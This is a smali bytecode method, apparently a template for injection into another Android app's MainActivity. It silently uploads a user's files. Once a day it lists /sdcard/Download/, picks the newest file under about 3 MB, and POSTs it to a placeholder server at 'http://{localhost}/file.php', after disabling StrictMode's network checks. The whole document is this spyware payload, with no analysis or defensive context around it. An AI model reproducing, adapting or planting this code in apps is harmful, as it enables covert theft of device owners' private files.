.method private iq500sendFile()V
    .registers 38
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 70
    move-object/from16 v2, p0

    :try_start_2
    new-instance v28, Ljava/io/File;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    const-string v30, "/sdcard"

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v4, v28

    .line 71
    move-object/from16 v28, v4

    invoke-virtual/range {v28 .. v28}, Ljava/io/File;->canRead()Z

    move-result v28

    new-instance v29, Ljava/lang/Boolean;

    move/from16 v35, v28

    move-object/from16 v36, v29

    move-object/from16 v28, v36

    move/from16 v29, v35

    move-object/from16 v30, v36

    move/from16 v35, v29

    move-object/from16 v36, v30

    move-object/from16 v29, v36

    move/from16 v30, v35

    invoke-direct/range {v29 .. v30}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v5, v28

    .line 72
    move-object/from16 v28, v5

    check-cast v28, Ljava/lang/Boolean;

    invoke-virtual/range {v28 .. v28}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v28

    if-nez v28, :cond_3b

    .line 176
    :goto_3a
    return-void

    .line 81
    :cond_3b
    const/16 v28, 0x0

    new-instance v29, Ljava/lang/Boolean;

    move/from16 v35, v28

    move-object/from16 v36, v29

    move-object/from16 v28, v36

    move/from16 v29, v35

    move-object/from16 v30, v36

    move/from16 v35, v29

    move-object/from16 v36, v30

    move-object/from16 v29, v36

    move/from16 v30, v35

    invoke-direct/range {v29 .. v30}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v6, v28

    .line 82
    new-instance v28, Ljava/util/Date;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    invoke-direct/range {v29 .. v29}, Ljava/util/Date;-><init>()V

    move-object/from16 v7, v28

    .line 83
    move-object/from16 v28, v7

    invoke-virtual/range {v28 .. v28}, Ljava/util/Date;->getTime()J

    move-result-wide v28

    move-wide/from16 v8, v28

    .line 84
    move-object/from16 v28, v2

    const-string v29, "loadpref"

    const/16 v30, 0x0

    invoke-virtual/range {v28 .. v30}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;

    move-result-object v28

    move-object/from16 v10, v28

    .line 85
    move-object/from16 v28, v10

    invoke-interface/range {v28 .. v28}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;

    move-result-object v28

    move-object/from16 v11, v28

    .line 87
    move-object/from16 v28, v10

    const-string v29, "lastUpload"

    const/16 v30, 0x0

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    invoke-interface/range {v28 .. v31}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J

    move-result-wide v28

    move-wide/from16 v12, v28

    .line 89
    move-wide/from16 v28, v12

    const/16 v30, 0x0

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    cmp-long v28, v28, v30

    if-eqz v28, :cond_af

    move-wide/from16 v28, v8

    move-wide/from16 v30, v12

    sub-long v28, v28, v30

    const v30, 0x5265c00

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    cmp-long v28, v28, v30

    if-ltz v28, :cond_da

    .line 91
    :cond_af
    move-object/from16 v28, v11

    const-string v29, "lastUpload"

    move-wide/from16 v30, v8

    invoke-interface/range {v28 .. v31}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;

    move-result-object v28

    .line 92
    move-object/from16 v28, v11

    invoke-interface/range {v28 .. v28}, Landroid/content/SharedPreferences$Editor;->commit()Z

    move-result v28

    .line 93
    const/16 v28, 0x1

    new-instance v29, Ljava/lang/Boolean;

    move/from16 v35, v28

    move-object/from16 v36, v29

    move-object/from16 v28, v36

    move/from16 v29, v35

    move-object/from16 v30, v36

    move/from16 v35, v29

    move-object/from16 v36, v30

    move-object/from16 v29, v36

    move/from16 v30, v35

    invoke-direct/range {v29 .. v30}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v6, v28

    .line 97
    :cond_da
    move-object/from16 v28, v6

    check-cast v28, Ljava/lang/Boolean;

    invoke-virtual/range {v28 .. v28}, Ljava/lang/Boolean;->booleanValue()Z
    :try_end_e1
    .catch Ljava/lang/Exception; {:try_start_2 .. :try_end_e1} :catch_347

    move-result v28

    if-eqz v28, :cond_1c7

    .line 101
    :try_start_e4
    new-instance v28, Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    invoke-direct/range {v29 .. v29}, Landroid/os/StrictMode$ThreadPolicy$Builder;-><init>()V

    invoke-virtual/range {v28 .. v28}, Landroid/os/StrictMode$ThreadPolicy$Builder;->permitAll()Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-result-object v28

    invoke-virtual/range {v28 .. v28}, Landroid/os/StrictMode$ThreadPolicy$Builder;->build()Landroid/os/StrictMode$ThreadPolicy;

    move-result-object v28

    move-object/from16 v14, v28

    .line 102
    move-object/from16 v28, v14

    invoke-static/range {v28 .. v28}, Landroid/os/StrictMode;->setThreadPolicy(Landroid/os/StrictMode$ThreadPolicy;)V

    .line 105
    const-string v28, "/sdcard/Download/"

    move-object/from16 v15, v28

    .line 107
    new-instance v28, Ljava/io/File;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    move-object/from16 v30, v15

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v16, v28

    .line 110
    move-object/from16 v28, v16

    invoke-virtual/range {v28 .. v28}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v28

    move-object/from16 v17, v28

    .line 113
    const-string v28, ""

    move-object/from16 v18, v28

    .line 116
    move-object/from16 v28, v17

    if-eqz v28, :cond_134

    .line 117
    const/16 v28, 0x0

    move/from16 v19, v28

    :goto_125
    move/from16 v28, v19

    move-object/from16 v29, v17

    move-object/from16 v0, v29

    array-length v0, v0

    move/from16 v29, v0

    move/from16 v0, v28

    move/from16 v1, v29

    if-lt v0, v1, :cond_1c9

    .line 131
    :cond_134
    move-object/from16 v28, v18

    const-string v29, "///n"

    invoke-virtual/range {v28 .. v29}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v28

    move-object/from16 v19, v28

    .line 132
    const-string v28, ""

    move-object/from16 v20, v28

    .line 133
    const/16 v28, 0x0

    move/from16 v0, v28

    int-to-long v0, v0

    move-wide/from16 v28, v0

    move-wide/from16 v21, v28

    .line 135
    const/16 v28, 0x0

    move/from16 v23, v28

    :goto_14f
    move/from16 v28, v23

    move-object/from16 v29, v19

    move-object/from16 v0, v29

    array-length v0, v0

    move/from16 v29, v0

    move/from16 v0, v28

    move/from16 v1, v29

    if-lt v0, v1, :cond_2fc

    .line 144
    move-object/from16 v28, v20

    const-string v29, ""

    move-object/from16 v0, v28

    move-object/from16 v1, v29

    if-eq v0, v1, :cond_1c7

    .line 147
    new-instance v28, Ljava/io/File;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    move-object/from16 v30, v20

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v23, v28

    .line 150
    new-instance v28, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    move-object/from16 v30, v23

    const-string v31, "binary/octet-stream"

    invoke-direct/range {v29 .. v31}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v24, v28

    .line 153
    new-instance v28, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    const-string v30, "http://{localhost}/file.php"

    invoke-direct/range {v29 .. v30}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v25, v28

    .line 156
    move-object/from16 v28, v25

    move-object/from16 v29, v24

    invoke-virtual/range {v28 .. v29}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 157
    move-object/from16 v28, v24

    const-string v29, "binary/octet-stream"

    invoke-virtual/range {v28 .. v29}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 160
    move-object/from16 v28, v25

    const-string v29, "fname"

    move-object/from16 v30, v23

    invoke-virtual/range {v30 .. v30}, Ljava/io/File;->getName()Ljava/lang/String;

    move-result-object v30

    invoke-virtual/range {v28 .. v30}, Lorg/apache/http/client/methods/HttpPost;->setHeader(Ljava/lang/String;Ljava/lang/String;)V

    .line 163
    new-instance v28, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    invoke-direct/range {v29 .. v29}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v26, v28

    .line 164
    move-object/from16 v28, v26

    move-object/from16 v29, v25

    invoke-interface/range {v28 .. v29}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v28

    .line 176
    :cond_1c7
    :goto_1c7
    goto/16 :goto_3a

    .line 119
    :cond_1c9
    new-instance v28, Ljava/io/File;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    new-instance v30, Ljava/lang/StringBuffer;

    move-object/from16 v35, v30

    move-object/from16 v30, v35

    move-object/from16 v31, v35

    invoke-direct/range {v31 .. v31}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v31, v15

    invoke-virtual/range {v30 .. v31}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v30

    move-object/from16 v31, v17

    move/from16 v32, v19

    aget-object v31, v31, v32

    invoke-virtual/range {v30 .. v31}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v30

    invoke-virtual/range {v30 .. v30}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v30

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v28 .. v28}, Ljava/io/File;->length()J

    move-result-wide v28

    const/16 v30, 0x400

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    div-long v28, v28, v30

    const/16 v30, 0x400

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    div-long v28, v28, v30

    const/16 v30, 0x3

    move/from16 v0, v30

    int-to-long v0, v0

    move-wide/from16 v30, v0

    cmp-long v28, v28, v30

    if-lez v28, :cond_2f8

    const/16 v28, 0x0

    :goto_216
    new-instance v29, Ljava/lang/Boolean;

    move/from16 v35, v28

    move-object/from16 v36, v29

    move-object/from16 v28, v36

    move/from16 v29, v35

    move-object/from16 v30, v36

    move/from16 v35, v29

    move-object/from16 v36, v30

    move-object/from16 v29, v36

    move/from16 v30, v35

    invoke-direct/range {v29 .. v30}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v20, v28

    .line 120
    new-instance v28, Ljava/io/File;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    new-instance v30, Ljava/lang/StringBuffer;

    move-object/from16 v35, v30

    move-object/from16 v30, v35

    move-object/from16 v31, v35

    invoke-direct/range {v31 .. v31}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v31, v15

    invoke-virtual/range {v30 .. v31}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v30

    move-object/from16 v31, v17

    move/from16 v32, v19

    aget-object v31, v31, v32

    invoke-virtual/range {v30 .. v31}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v30

    invoke-virtual/range {v30 .. v30}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v30

    invoke-direct/range {v29 .. v30}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v28 .. v28}, Ljava/io/File;->isFile()Z

    move-result v28

    new-instance v29, Ljava/lang/Boolean;

    move/from16 v35, v28

    move-object/from16 v36, v29

    move-object/from16 v28, v36

    move/from16 v29, v35

    move-object/from16 v30, v36

    move/from16 v35, v29

    move-object/from16 v36, v30

    move-object/from16 v29, v36

    move/from16 v30, v35

    invoke-direct/range {v29 .. v30}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v21, v28

    .line 121
    move-object/from16 v28, v20

    check-cast v28, Ljava/lang/Boolean;

    invoke-virtual/range {v28 .. v28}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v28

    if-eqz v28, :cond_2f4

    move-object/from16 v28, v21

    check-cast v28, Ljava/lang/Boolean;

    invoke-virtual/range {v28 .. v28}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v28

    if-eqz v28, :cond_2f4

    .line 123
    new-instance v28, Ljava/lang/StringBuffer;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    invoke-direct/range {v29 .. v29}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v29, v18

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    new-instance v29, Ljava/lang/StringBuffer;

    move-object/from16 v35, v29

    move-object/from16 v29, v35

    move-object/from16 v30, v35

    invoke-direct/range {v30 .. v30}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v30, v15

    invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v29

    move-object/from16 v30, v17

    move/from16 v31, v19

    aget-object v30, v30, v31

    invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v29

    invoke-virtual/range {v29 .. v29}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v29

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    invoke-virtual/range {v28 .. v28}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v28

    move-object/from16 v18, v28

    .line 124
    move/from16 v28, v19

    move-object/from16 v29, v17

    move-object/from16 v0, v29

    array-length v0, v0

    move/from16 v29, v0

    const/16 v30, 0x1

    add-int/lit8 v29, v29, -0x1

    move/from16 v0, v28

    move/from16 v1, v29

    if-ge v0, v1, :cond_2f4

    .line 125
    new-instance v28, Ljava/lang/StringBuffer;

    move-object/from16 v35, v28

    move-object/from16 v28, v35

    move-object/from16 v29, v35

    invoke-direct/range {v29 .. v29}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v29, v18

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    const-string v29, "///n"

    invoke-virtual/range {v28 .. v29}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v28

    invoke-virtual/range {v28 .. v28}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v28

    move-object/from16 v18, v28

    .line 117
    :cond_2f4
    add-int/lit8 v19, v19, 0x1

    goto/16 :goto_125

    .line 119
    :cond_2f8
    const/16 v28, 0x1

    goto/16 :goto_216

    .line 137
    :cond_2fc
    move-wide/from16 v28, v21

    move-wide/from16 v24, v28

    .line 138
    move-wide/from16 v28, v21

    new-instance v30, Ljava/io/File;

    move-object/from16 v35, v30

    move-object/from16 v30, v35

    move-object/from16 v31, v35

    move-object/from16 v32, v19

    move/from16 v33, v23

    aget-object v32, v32, v33

    invoke-direct/range {v31 .. v32}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v30 .. v30}, Ljava/io/File;->lastModified()J

    move-result-wide v30

    invoke-static/range {v28 .. v31}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v28

    move-wide/from16 v21, v28

    .line 139
    move-wide/from16 v28, v24

    move-wide/from16 v30, v21

    cmp-long v28, v28, v30

    if-eqz v28, :cond_32d

    .line 140
    move-object/from16 v28, v19

    move/from16 v29, v23

    aget-object v28, v28, v29
    :try_end_32b
    .catch Ljava/lang/Exception; {:try_start_e4 .. :try_end_32b} :catch_331

    move-object/from16 v20, v28

    .line 135
    :cond_32d
    add-int/lit8 v23, v23, 0x1

    goto/16 :goto_14f

    .line 164
    :catch_331
    move-exception v28

    move-object/from16 v14, v28

    .line 170
    move-object/from16 v28, v14

    :try_start_336
    invoke-virtual/range {v28 .. v28}, Ljava/lang/Exception;->printStackTrace()V

    .line 171
    const-string v28, "iq500"

    move-object/from16 v29, v14

    invoke-virtual/range {v29 .. v29}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v29

    invoke-static/range {v28 .. v29}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    :try_end_344
    .catch Ljava/lang/Exception; {:try_start_336 .. :try_end_344} :catch_347

    move-result v28

    goto/16 :goto_1c7

    :catch_347
    move-exception v28

    move-object/from16 v4, v28

    .line 175
    move-object/from16 v28, v4

    invoke-virtual/range {v28 .. v28}, Ljava/lang/Exception;->printStackTrace()V

    .line 176
    const-string v28, "iq500"

    move-object/from16 v29, v4

    invoke-virtual/range {v29 .. v29}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v29

    invoke-static/range {v28 .. v29}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I

    move-result v28

    goto/16 :goto_1c7
.end method